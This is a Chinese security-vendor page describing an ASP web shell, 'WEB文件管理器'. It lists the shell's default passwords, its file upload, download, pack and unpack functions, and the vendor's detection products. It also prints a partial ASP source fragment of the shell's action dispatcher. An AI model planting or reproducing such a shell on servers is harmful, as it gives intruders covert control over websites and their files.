WEB文件管理器

2011-12-12 17:28:26 来源:本站原创,请勿转载 浏览:341
WEB文件管理器

木马名称:WEB文件管理器
木马格式:asp
默认密码:stoneaini,123456,admin
木马作用:严格来说,WEB文件管理器是一款asp编写的在线文件管理系统,而不是网页木马。但是呢,它的功能,很多跟网页木马是一样的,如:上传文件,下载文件,打包文件,解压文件。

运行界面如下:

总结:WEB文件管理器是一款在线文件管理系统,可以实现网页木马的部分功能,是一款比一般网页小马更强大的工具。
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 WEB文件管理器 这个asp网页木马。

WEB文件管理器部分代码:
<%
Server.ScriptTimeout = 999
action = Request('action')
temp = Split(Request.ServerVariables('URL'), '/')
url = temp(UBound(temp))
 pass = editpwd'登陆验证
Call ChkLogin()
Set fso = CreateObject('Scripting.FileSystemObject')
Select Case action
    Case '新建文件'
        Call fileform(Request('path')&'\')
    Case 'savefile'
        Call savefile(Request('filename'), Request('content'), Request('filename1'))
    Case '新建文件夹'
        Call newfolder(Request('path')&'\')
    Case 'savefolder'
        Call savefolder(Request('foldername'))
    Case '编辑'
        Call edit(Request('f'))
    Case '重命名'
        Call renameform(Request('f'))
    Case 'saverename'
        Call rename(Request('oldname'), Request('newname'))
    Case '剪切'
        session('f') = request('f')
        session('action') = action
        Response.Redirect(url&'?foldername='&Request('path'))
    Case '复制'
        session('f') = request('f')
        session('action') = action
        Response.Redirect(url&'?foldername='&Request('path'))
    Case '粘贴'
        Call affix(Request('path')&'\')
    Case '删除'
        Call Delete( request('f'), Request('path') )
    Case 'uploadform'
        Call uploadform(Request('filepath'), Request('path'))
    Case 'saveupload'
        Call saveupload()
    Case '下载'
        Call download(request('f'))
    Case '打包'
        Dim Str, s, s1, s2, rep
        Call Dabao( Request('f'), Request('path') )
    Case '解包'
        Call Jiebao(Request('f'), Request('path'))
    Case '退出'
        Call logout()
    Case Else
        Path = Request('foldername')
        If Path = '' Then Path = server.MapPath('./')
        ShowFolderList(Path)
End Select
Set fso = Nothing
'列出文件和文件夹

(0)
(0)